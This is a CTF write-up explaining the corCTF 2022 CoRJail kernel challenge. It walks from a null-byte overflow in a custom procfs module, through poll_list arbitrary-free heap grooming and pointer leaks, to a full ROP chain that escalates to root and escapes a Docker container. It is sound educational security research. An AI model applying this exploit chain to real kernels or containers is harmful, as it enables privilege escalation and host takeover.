[corCTF 2022] CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll

CoRJail is a kernel exploitation challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters exploiting a Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from a nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!

Overview

Last year FizzBuzz101 and me, designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. During this year, the technique has been extensively used in real world exploits and later extended to be used with FUSE instead of userfaultfd.

For corCTF 2022, we decided to do the same, designing two challenges of which solutions required a novel approach. I decided to write CoRJail, demonstrating a novel approach I originally used to compromise Google’s kCTF. This technique consists of an arbitrary free primitive obtainable in almost every general purpose cache exploiting poll_list objects. FizzBuzz101 instead, designed a challenge, Cache of Castaways, of which solution required a cross-cache overflow into cred_jar to corrupt the current task’s cred structure to get root privileges.

CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image, improperly called CoROS. The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing the Linux Kernel Key Retention Service to be accessed from within the container. The custom seccomp profile can be found here.

The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.

All modern protections, like KASLR, SMEP, SMAP, KPTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED etc. were enabled. CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary and CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, no modprobe_path trick. Finally, I unset CONFIG_DEBUG_FS and CONFIG_KALLSYMS_ALL, making many symbols not available in /proc/kallsyms.

The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs interface, was created to actually display per-CPU syscall count, restricting the displayed result only to syscalls specified in a filter. Users were allowed to set a new filter using echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon. For example: echo -n 'sys_read,sys_write' > /proc_rw/cormon.

The default CoRMon filter was actually a hint, indeed it displayed many syscalls I used in my exploit: poll(), keyctl() and setxattr().

If you want to solve the challenge before reading the rest of the article, it can be found in the corCTF 2022 Public Archive.

Please note that I could not upload the coros.qcow2 image on Github because of its size, so you will need to build it yourself using the provided script.

TL;DR

Exploit a Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get OOB Read. Leak heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key and guess the correct options on the CoR Flag License Website to get the actual flag.

It’s Only A Zero, What Could Go Wrong?

Given the relatively complex exploitation stage and the 48 hours limit, I decided to make the bug extremely easy to spot and trigger. On the other hand I decided to not provide source code, considering the reverse engineering process would not have taken too long.

Here is the original CoRMon source code:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/seq_file.h>
#include <trace/syscall.h>
#include <asm/syscall.h>
#include <asm/ftrace.h>

MODULE_AUTHOR("D3v17");
MODULE_LICENSE("GPL");

extern struct syscall_metadata *syscall_nr_to_meta(int nr);
extern const char *get_syscall_name(int syscall_nr);

static int get_syscall_nr(char *sc);
static int update_filter(char *syscalls);
static int cormon_proc_open(struct inode *inode, struct  file *file);
static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf,size_t count, loff_t *ppos); 
static void *cormon_seq_start(struct seq_file *seqfile, loff_t *pos);
static void *cormon_seq_next(struct seq_file *seqfile, void *v, loff_t *pos);
static void cormon_seq_stop(struct seq_file *seqfile, void *v);
static int cormon_seq_show(struct seq_file *f, void *ppos);
static int init_procfs(void);
static void cleanup_procfs(void);

DECLARE_PER_CPU(u64[NR_syscalls], __per_cpu_syscall_count);

static uint8_t filter[NR_syscalls];
static struct proc_dir_entry *cormon;
static char initial_filter[] = "sys_execve,sys_execveat,sys_fork,sys_keyctl,sys_msgget,sys_msgrcv"                    
                                "sys_msgsnd,sys_poll,sys_ptrace,sys_setxattr,sys_unshare";


static const struct proc_ops cormon_proc_ops = {
    .proc_open  = cormon_proc_open,
    .proc_read  = seq_read,
    .proc_write = cormon_proc_write
};


static struct seq_operations cormon_seq_ops = {
    .start  = cormon_seq_start,
    .next   = cormon_seq_next,
    .stop   = cormon_seq_stop,
    .show   = cormon_seq_show
};


static int get_syscall_nr(char *sc)
{
    struct syscall_metadata *entry;
    int nr;

    for (nr = 0; nr < NR_syscalls; nr++)
    {
        entry = syscall_nr_to_meta(nr);

        if (!entry)
            continue;

        if (arch_syscall_match_sym_name(entry->name, sc))
            return nr;
    }

    return -EINVAL;
}


static int update_filter(char *syscalls)
{
    uint8_t new_filter[NR_syscalls] = { 0 };
    char *name;
    int nr;

    while ((name = strsep(&syscalls, ",")) != NULL || syscalls != NULL)
    {
        nr = get_syscall_nr(name);

        if (nr < 0)
        {
            printk(KERN_ERR "[CoRMon::Error] Invalid syscall: %s!\n", name);
            return -EINVAL;
        }

        new_filter[nr] = 1;
    }

    memcpy(filter, new_filter, sizeof(filter));

    return 0;
}


static int cormon_proc_open(struct inode *inode, struct  file *file)
{
    return seq_open(file, &cormon_seq_ops);
}


static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    loff_t offset = *ppos;
    char *syscalls;
    size_t len;

    if (offset < 0)
        return -EINVAL;

    if (offset >= PAGE_SIZE || !count)
        return 0;

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count;

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC);
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len))
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00';

    if (update_filter(syscalls))
    {
        kfree(syscalls);
        return -EINVAL;
    }

    kfree(syscalls);

    return count;
}


static void *cormon_seq_start(struct seq_file *s, loff_t *pos)
{
    return *pos > NR_syscalls ? NULL : pos;
}


static void *cormon_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
    return (*pos)++ > NR_syscalls ? NULL : pos;
}


static void cormon_seq_stop(struct seq_file *s, void *v)
{
    return;
}


static int cormon_seq_show(struct seq_file *s, void *pos)
{
    loff_t nr = *(loff_t *)pos;
    const char *name;
    int i;

    if (nr == 0)
    {
        seq_putc(s, '\n');

        for_each_online_cpu(i)
            seq_printf(s, "%9s%d", "CPU", i);

        seq_printf(s, "\tSyscall (NR)\n\n");
    }

    if (filter[nr])
    {
        name = get_syscall_name(nr);

        if (!name)
            return 0;

        for_each_online_cpu(i)
            seq_printf(s, "%10llu", per_cpu(__per_cpu_syscall_count, i)[nr]);

        seq_printf(s, "\t%s (%lld)\n", name, nr);
    }

    if (nr == NR_syscalls)
        seq_putc(s, '\n');

    return 0;
}


static int init_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Init] Initializing module...\n");

    cormon = proc_create("cormon", 0666, NULL, &cormon_proc_ops);

    if (!cormon)
    {
        printk(KERN_ERR "[CoRMon::Error] proc_create() call failed!\n");
        return -ENOMEM;
    }

    if (update_filter(initial_filter))
        return -EINVAL;

    printk(KERN_INFO "[CoRMon::Init] Initialization complete!\n");

    return 0;
}


static void cleanup_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Exit] Cleaning up...\n");

    remove_proc_entry("cormon", NULL);

    printk(KERN_INFO "[CoRMon::Exit] Cleanup done, bye!\n");
}


module_init(init_procfs);
module_exit(cleanup_procfs);

We can interact with the module through a procfs interface using read() and write(). When we use write() the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function instead, is used to display syscalls information when we use read().

As we can see, there is a clear Off-By-Null in cormon_proc_write(). Let’s extract the function from source code and ignore the rest:

static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    [...]

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count; // [1]

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC); // [2]
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len)) // [3]
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00'; // [4]

    [...]
}

If the number of bytes written is greater than PAGE_SIZE (4096) then the len variable is set to PAGE_SIZE - 1, otherwise it is set to count. [1]

Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k [2] and the list of syscalls is copied from user-space to kernel-space: it will be parsed by update_filter(). [3] The list, now copied to kernel-space, is subsequently null terminated. [4]

The check is clearly not covering the case where the number of bytes written is equal to PAGE_SIZE. Indeed, in that case, len would be equal to count, and the line syscalls[len] = '\x00', would result in syscalls[4096] = '\x00', causing the null byte to be written out of bounds.

This, will be enough to escape from the container and get root privileges on the host.

A Dive Into poll_list Objects

As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features.

Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so for this time the old good msg_msg will be left out of the picture.

Instead, our exploitation process will mainly rely on poll_list objects. This structure can be used from within the container without having to meet any specific requirements.

The technique we will cover in this article, is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, here instead we only have a single null byte written out of bounds.

poll_list objects, are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.

int poll(struct pollfd fds[], nfds_t nfds, int timeout);

poll() accepts three arguments:

fds: an array of pollfd structures.
nfds: the number of pollfd structures in the fds array.
timeout: the number of milliseconds for an event to occur.

struct pollfd {
    int   fd;
    short events;
    short revents;
};

struct poll_list {
    struct poll_list *next; // [1]
    int len; // [2]
    struct pollfd entries[]; // [3]
};

The poll_list structure, is composed by a pointer to the next poll_list [1], a length field, corresponding to the number of pollfd structures in the entries array [2], and entries, a flexible array of pollfd structures [3]. Each entry is 8 bytes in size.

When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array to kernel-space:

#define POLL_STACK_ALLOC 256
#define PAGE_SIZE 4096

#define POLLFD_PER_PAGE  ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd))

#define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list))  / \
            sizeof(struct pollfd))

[...]

static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
        struct timespec64 *end_time)
{

    struct poll_wqueues table;
    int err = -EFAULT, fdcount, len;
    /* Allocate small arguments on the stack to save memory and be
        faster - use long to make sure the buffer is aligned properly
        on 64 bit archs to avoid unaligned access */
    long stack_pps[POLL_STACK_ALLOC/sizeof(long)]; // [1]
    struct poll_list *const head = (struct poll_list *)stack_pps;
    struct poll_list *walk = head;
    unsigned long todo = nfds;

    if (nfds > rlimit(RLIMIT_NOFILE))
        return -EINVAL;

    len = min_t(unsigned int, nfds, N_STACK_PPS); // [2]

    for (;;) {
        walk->next = NULL;
        walk->len = len;
        if (!len)
            break;

        if (copy_from_user(walk->entries, ufds + nfds-todo,
                    sizeof(struct pollfd) * walk->len))
            goto out_fds;

        todo -= walk->len;
        if (!todo)
            break;

        len = min(todo, POLLFD_PER_PAGE); // [3]
        walk = walk->next = kmalloc(struct_size(walk, entries, len),
                        GFP_KERNEL); // [4]
        if (!walk) {
            err = -ENOMEM;
            goto out_fds;
        }
    }

    poll_initwait(&table);
    fdcount = do_poll(head, &table, end_time); // [5]
    poll_freewait(&table);

    if (!user_write_access_begin(ufds, nfds * sizeof(*ufds))and)
        goto out_fds;

    for (walk = head; walk; walk = walk->next) {
        struct pollfd *fds = walk->entries;
        int j;

        for (j = walk->len; j; fds++, ufds++, j--)
            unsafe_put_user(fds->revents, &ufds->revents, Efault);
    }
    user_write_access_end();

    err = fdcount;
out_fds:
    walk = head->next;
    while (walk) { // [6]
        struct poll_list *pos = walk;
        walk = walk->next;
        kfree(pos);
    }

    return err;

Efault:
    user_write_access_end();
    err = -EFAULT;
    goto out_fds;
}

do_sys_poll() has two paths, a slow and a fast path. As we can see at the beginning of the function, stack_pps [1], a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries [2]. This is the fast path: entries are stored on the stack to save memory and improve speed.

If we submit more than 30 pollfd entries, we enter the slow path and the remaining ones are allocated on kernel heap. This means that if we do the math correctly, controlling the number of monitored file descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. [4]

It is possible to allocate a maximum of POLLFD_PER_PAGE (510) entries per page. [3] If this limit is exceeded, a new poll_list is allocated to store the remaining entries and it is connected to the previous one in a singly linked list. The for loop continues until all entries have been stored in kernel memory.

Let’s say for example we call poll(), providing 510 + 1 file descriptors to the syscall. This, in kernel space, results in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list, with a single entry, allocated in kmalloc-32. The structures are connected in a singly linked list:

After all poll_list objects have been allocated, there is a call to do_poll(): it will monitor provided file descriptors until a specific event occurs or the timer expires. [5] The end_time variable here, corresponds to the timeout variable we passed as third argument to the poll() syscall.

This means that poll_list objects can be kept in memory for an arbitrary amount of time, then, when timer expires, they will be automatically freed.

The very interesting part, is how poll_list structures are freed: a while loop is used to traverse the singly linked list, freeing each of them. [6] Now let’s look at what we have from an attacker’s prospective.

We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed by its next field (first QWORD) is automatically freed when a timer, that we control, expires. This means that given a Out-Of-Bounds Write or a Use-After-Free Write primitive we can overwrite the next field of a poll_list structure with the address of a target object and when the timer fires, that object will be automatically freed.

The only constraint, is that we need to make sure the first QWORD of the target object is NULL, otherwise the while loop, will treat it as a valid pointer, and will try to access it. This is not a problem, we can use a misaligned free primitive or we can simply target objects of which first QWORD is equal to zero.

In the specific case of kmalloc-4k, if the poll_list->next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even with a single byte), making it point to another object in the slab. When timer expires, the kernel will be tricked into freeing the wrong object. This, is exactly what we are going to do in the exploit.

The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object because the poll() syscall will block until a specific event occurs or the timer expires.

#define N_STACK_PPS 30
#define POLLFD_PER_PAGE 510
#define POLL_LIST_SIZE 16

#define NFDS(size) (((size - POLL_LIST_SIZE) / sizeof(struct pollfd)) + N_STACK_PPS);


pthread_t poll_tid[0x1000];
size_t poll_threads;
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;


struct t_args
{
    int id;
    int nfds;
    int timeout;
};


void *alloc_poll_list(void *args)
{
    struct pollfd *pfds;
    int nfds, timeout, id;

    id    = ((struct t_args *)args)->id;
    nfds  = ((struct t_args *)args)->nfds;
    timeout = ((struct t_args *)args)->timeout;

    pfds = calloc(nfds, sizeof(struct pollfd));

    for (int i = 0; i < nfds; i++)
    {
        pfds[i].fd = fds[0];
        pfds[i].events = POLLERR;
    }

    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);

    //printf("[Thread %d] Start polling...\n", id);
    int ret = poll(pfds, nfds, timeout);
    //printf("[Thread %d] Polling complete: %d!\n", id, ret); 
}


void create_poll_thread(int id, size_t size, int timeout)
{
    struct t_args *args;

    args = calloc(1, sizeof(struct t_args));

    if (size > PAGE_SIZE)
        size = size - ((size/PAGE_SIZE) * sizeof(struct poll_list));

    args->id = id;
    args->nfds = NFDS(size);
    args->timeout = timeout;

    pthread_create(&poll_tid[id], 0, alloc_poll_list, (void *)args);
}


void join_poll_threads(void)
{
    for (int i = 0; i < poll_threads; i++)
        pthread_join(poll_tid[i], NULL);
        
    poll_threads = 0;
}

[...]

fds[i] = open("/etc/passwd", O_RDONLY);

for (int i = 0; i < 8; i++)
    create_poll_thread(i, 4096 + 32, 3000);

join_poll_threads();

[...]

The Exploit - From Zero To Information Leak

The strategy we are going to use in the first part of the exploit, consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the next field of a poll_list structure chained to another one in kmalloc-32, making the corrupted pointer point to another object in the slab. When the timer fires, that object will be automatically freed.

We need to choose a target structure that once arbirarily freed, can be corrupted and can give us a Out-Of-Bounds Read primitive, with subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick. A good candidate could be simple_xattr, but we need the first QWORD of the target object to be NULL, so we cannot use it. Since add_key() and keyctl() are not blocked by seccomp, we can opt for user_key_payload instead.

The problem with this structure, is that its first member, struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc, the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating each user key.

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
        size_t size, int flags)
{
    [...]
    
    if (size > XATTR_SIZE_MAX)
        return -E2BIG;
    kvalue = kvmalloc(size, GFP_KERNEL); // [1]
    if (!kvalue)
        return -ENOMEM;
    if (copy_from_user(kvalue, value, size)) { // [2]
        error = -EFAULT;
        goto out;
    }
    
    [...]

out:
    kvfree(kvalue); // [3]

    return error;
}

With setxattr(), we can allocate a chunk of arbitrary size [1] and fill it with arbitrary data [2], then, it will be automatically freed [3]. We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero.

We simply need to call setxattr() right before alloc_key(): because of freelists LIFO behavior, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. Now we can be sure the first QWORD is set to NULL.

With this in mind, we can start writing our exploit:

[...]

assign_to_core(0); // [1]

for (int i = 0; i < 2048; i++) // [2]
    alloc_seq_ops(i);

for (int i = 0; i < 72; i++)
{   
    setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
    keys[i] = alloc_key(n_keys++, key, 32); // [3]
}

for (int i = 0; i < 14; i++)
    create_poll_thread(i, 4096 + 24, 3000, false); // [4]

for (int i = 72; i < MAX_KEYS; i++) 
{
    setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
    keys[i] = alloc_key(n_keys++, key, 32); // [5]
}

[...]

First, we assign the current process to core 0 using assign_to_core() (a sched_setaffinity() wrapper), since we are working in a multi-core environment and slabs are per-CPU. [1] Then, we start spraying many seq_operations structures in kmalloc-32 to fill partial slabs, so the next allocations will end up in a brand new slab. [2]

We proceed using alloc_key() (a simple add_key() wrapper) to spray many user_key_payload structures in kmalloc-32. [3] As explained above, we use setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.

Now we finally spray poll_list structures in kmalloc-4k, chained to poll_list in kmalloc-32. [4] At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user_key_payload in orange.

We can continue spraying more user keys in kmalloc-32, to completely saturate the slab. [5] [Fig. 1B]

We are ready to trigger the Off-By-Null bug, hijack a poll_list next pointer and trigger the arbitrary free:

[...]

write(fd, data, PAGE_SIZE); // [1]

join_poll_threads(); // [2]

[...]

We can trigger the allocation of a chunk in kmalloc-4k by writing 4096 bytes to the CoRMon procfs interface. [1] This will also cause a null byte to be written out of bounds, and will corrupt the next object in memory. Since we sprayed poll_list structures in kmalloc-4k, and each one has a pointer to a poll_list in kmalloc-32, we will be able to corrupt one of the pointers, making it point to one of the user keys we sprayed in the previous step. [Fig. 2A]

Now we can use join_poll_threads() and wait until timers expire and poll_list objects are automatically freed. [2] One of the user_key_payload will be released as well. [Fig. 2B]

We caused a Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain a Out-Of-Bounds Read primitive:

[...]

for (int i = 2048; i < 2048 + 128; i++)
    alloc_seq_ops(i); // [1]

if (leak_kernel_pointer() < 0) // [2]
{
    puts("[X] Kernel pointer leak failed, try again...");
    exit(1);
}

free_all_keys(true); // [3]

for (int i = 0; i < 72; i++)
    alloc_tty(i); // [4]

if (leak_heap_pointer(corrupted_key) < 0) // [5]
{
    puts("[X] Heap pointer leak failed, try again...");
    exit(1);
}

[...]

First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its len field (an unsigned short) with the two lower bytes of the single_next pointer.

In our case, the two lower bytes of single_next are 0x4330, so this will give us a huge Out-Of-Bounds Read primitive. A proc_single_show() pointer instead, will overwrite the first qword in the user key data field. [1] You can see the seq_operations structures in yellow in [Fig. 3A], one of them corrupted the key.

We can now use leak_kernel_pointer() to iterate through all the keys until we leak the proc_single_show address, this way we will identify the corrupted key and we will be able to calculate the kernel base address. [2] Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.

When we open a ptmx, two structures of our interest are allocated, the well known tty_struct in kmalloc-1024 and another one, tty_file_private in kmalloc-32. Each tty_file_private structure, has a pointer to relative tty_struct, therefore we can use it to leak the address of an object in kmalloc-1024.

We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]), [3] except the corrupted one, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]). [4] Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak the tty_struct address. [5] [Fig. 3B]

The Exploit - Hijacking Control Flow

At this point we need to free the object in kmalloc-1024.

[...]

for (int i = 2048; i < 2048 + 128; i++)
    free_seq_ops(i); // [1]

for (int i = 0; i < 192; i++)
    create_poll_thread(i, 24, 3000, true); // [2]

free_key(corrupted_key); // [3]
sleep(1); // GC key

*(uint64_t *)&data[0] = target_object - 0x18; // [4]

for (int i = 0; i < MAX_KEYS; i++)
{
    setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
    keys[i] = alloc_key(n_keys++, key, 32); // [5]
}

[...]

First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]) [1], then we replace them with poll_list objects (green chunks in [Fig. 4A]) [2]. Note that the seq_operations structure used to corrupt the user key is also freed and it is also replaced by a poll_list structure. [Fig. 4A]

Now we free the corrupted key, causing a Use-After-Free situation over the poll_list. [3] To exploit the Use-After-Free, we reuse the setxattr() trick used in the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to target object - 0x18 bytes [4], then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory.

In other words, since the chunk used by setxattr is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation. [5]

Doing so, we will overwrite the next field of the poll_list structure in kmalloc-32 with the target - 0x18 bytes. [Fig. 4B]

Originally, my goal was to arbitrarily free a tty_struct and get RIP control overwriting its tty_operations pointer. Then I changed my mind (too many checks, even if they can be bypassed), and I decided to target a pipe_buffer structure.

[...]

for (int i = 0; i < 72; i++)
    free_tty(i); // [1]

sleep(1); // GC TTYs

for (int i = 0; i < 1024; i++)
    alloc_pipe_buff(i); // [2]

[...]

free_all_keys(false);

for (int i = 0; i < 31; i++)
    keys[i] = alloc_key(n_keys++, buff, 600); // [3]

for (int i = 0; i < 1024; i++)
    release_pipe_buff(i); // [4]

[...]

We proceed freeing all TTYs [1], and we spray pipe_buffer objects [2]. This way we replace all tty_struct with pipe_buffer in kmalloc-1024. Then, we wait until timers expire, and the pipe_buffer object pointed by the next field of the corrupted poll_list, is automatically freed. [Fig. 5.A]

Finally, we free all user keys, and we reallocate them in kmalloc-1024: we use them to spray our ROP-chain. [3] One of the key payloads will corrupt the target pipe_buffer, overwriting the anon_pipe_buf_ops pointer with a stack pivot gadget.

Now we only need to close all pipes, triggering the call to pipe_release(). [4] This, will execute our stack pivot gadget and we will be finally able to hijack control flow. [Fig. 5B]

The Exploit - Container Escape

The last piece of the puzzle is the ROP-chain to use to escape from the container. Let’s take a look to what I used in the exploit:

buff = (char *)calloc(1, 1024);

// Stack pivot    [1]
*(uint64_t *)&buff[0x10] = target_object + 0x30;             // anon_pipe_buf_ops
*(uint64_t *)&buff[0x38] = kernel_base + 0xffffffff81882840; // push rsi ; in eax, dx ; jmp qword ptr [rsi + 0x66]
*(uint64_t *)&buff[0x66] = kernel_base + 0xffffffff810007a9; // pop rsp ; ret
*(uint64_t *)&buff[0x00] = kernel_base + 0xffffffff813c6b78; // add rsp, 0x78 ; ret

// ROP
rop = (uint64_t *)&buff[0x80];

// creds = prepare_kernel_cred(0)   [2]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= 0;                                // 0
*rop ++= kernel_base + 0xffffffff810ebc90; // prepare_kernel_cred

// commit_creds(creds)    [3]
*rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
*rop ++= 0;                                // 0
*rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
*rop ++= kernel_base + 0xffffffff810eba40; // commit_creds

// task = find_task_by_vpid(1)    [4]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= 1;                                // pid
*rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

// switch_task_namespaces(task, init_nsproxy)    [5]
*rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
*rop ++= 0;                                // 0
*rop ++= kernel_base + 0xffffffff81a05e4b; // mov rdi, rax ; rep movsq qword ptr [rdi], qword ptr [rsi] ; ret
*rop ++= kernel_base + 0xffffffff8100051c; // pop rsi ; ret
*rop ++= kernel_base + 0xffffffff8245a720; // init_nsproxy;
*rop ++= kernel_base + 0xffffffff810ea4e0; // switch_task_namespaces

// new_fs = copy_fs_struct(init_fs)    [6]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= kernel_base + 0xffffffff82589740; // init_fs;
*rop ++= kernel_base + 0xffffffff812e7350; // copy_fs_struct;
*rop ++= kernel_base + 0xffffffff810e6cb7; // push rax ; pop rbx ; ret

// current = find_task_by_vpid(getpid())    [7]
*rop ++= kernel_base + 0xffffffff81001618; // pop rdi ; ret
*rop ++= getpid();                         // pid
*rop ++= kernel_base + 0xffffffff810e4fc0; // find_task_by_vpid

// current->fs = new_fs    [8]
*rop ++= kernel_base + 0xffffffff8101f5fc; // pop rcx ; ret
*rop ++= 0x6e0;                            // current->fs
*rop ++= kernel_base + 0xffffffff8102396f; // add rax, rcx ; ret
*rop ++= kernel_base + 0xffffffff817e1d6d; // mov qword ptr [rax], rbx ; pop rbx ; ret
*rop ++= 0;                                // rbx

// kpti trampoline    [9]
*rop ++= kernel_base + 0xffffffff81c00ef0 + 22; // swapgs_restore_regs_and_return_to_usermode + 22
*rop ++= 0;
*rop ++= 0;
*rop ++= (uint64_t)&win;
*rop ++= usr_cs;
*rop ++= usr_rflags;
*rop ++= (uint64_t)(stack + 0x5000);
*rop ++= usr_ss;

The first part has nothing special. We use a stack pivot gadget to hijack control flow [1], then prepare_kernel_cred() [2] and commit_creds() [3] to escalate privileges, and then we locate the Docker container task using find_task_by_vpid() [4] and we use switch_task_namespaces() [5] to replace its nsproxy structure with init_nsproxy. But this is not enough to escape from the container.

In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp, this means that we cannot use it to enter other namespaces after returning in user-space. We need to find an alternative approach, and we need to implement it in the ROP-chain.

Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can replicate what it does using copy_fs_struct() to clone the init_fs structure [6], then we locate the current task using find_task_by_vpid() [7] and we manually install the new fs_struct using a write-what-where gadget. [8]

We can finally use the KPTI trampoline with swapgs_restore_regs_and_return_to_usermode and get a shell on the host. [9]

Here is the final exploit in action:

The final exploit can be found here: exploit.c.

PS: In the exploit I assign the process to another core before creating poll threads. This is useful to reduce noise due to thread creation on core 0 slabs. Once a thread has been created, it is assigned back to core-0 before calling poll().

Conclusion

poll_list objects, can be used to obtain an arbitrary free primitive in almost every general purpose cache. Many recent vulnerabilities can be exploited using this structure in complete absence of msg_msg objects.

CoRJail only had one solver. A big shout out goes to Kylebot for getting first blood. It turns out that Extended security attributes were usable inside the container without requiring any special capability. So he could solve the challenge transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow, targeting the list.next pointer of a simple_xattr structure in kmalloc-192.

This cache is unaligned, so he made the corrupted pointer point in middle of another simple_xattr object in the same slab. Here, he forged a fake header to obtain an Out-Of-Bounds Read primitive.

To fake a simple_xattr structure, he needed a valid pointer containing controlled data in the name field, so he ended up using another kCTF technique. He faked the pointer and its content using cpu_entry_area. This memory region is not affected by KASLR, and as reported by Kylebot, it is possible to use a div 0 or a ud2 instruction to copy all CPU registers in this zone and use them as a payload.

After obtaining information leak, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach! Isn’t it?

If you have any question or need any clarification, feel free to contact me. You can find my contact information in About.

The challenge can be downloaded from the corCTF 2022 Public Archive.

References

Syscall statistics patch

https://lwn.net/Articles/896474/

Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel

https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)

modprobe_path trick

https://github.com/smallkirby/kernelpwn/blob/master/technique/modprobe_path.md

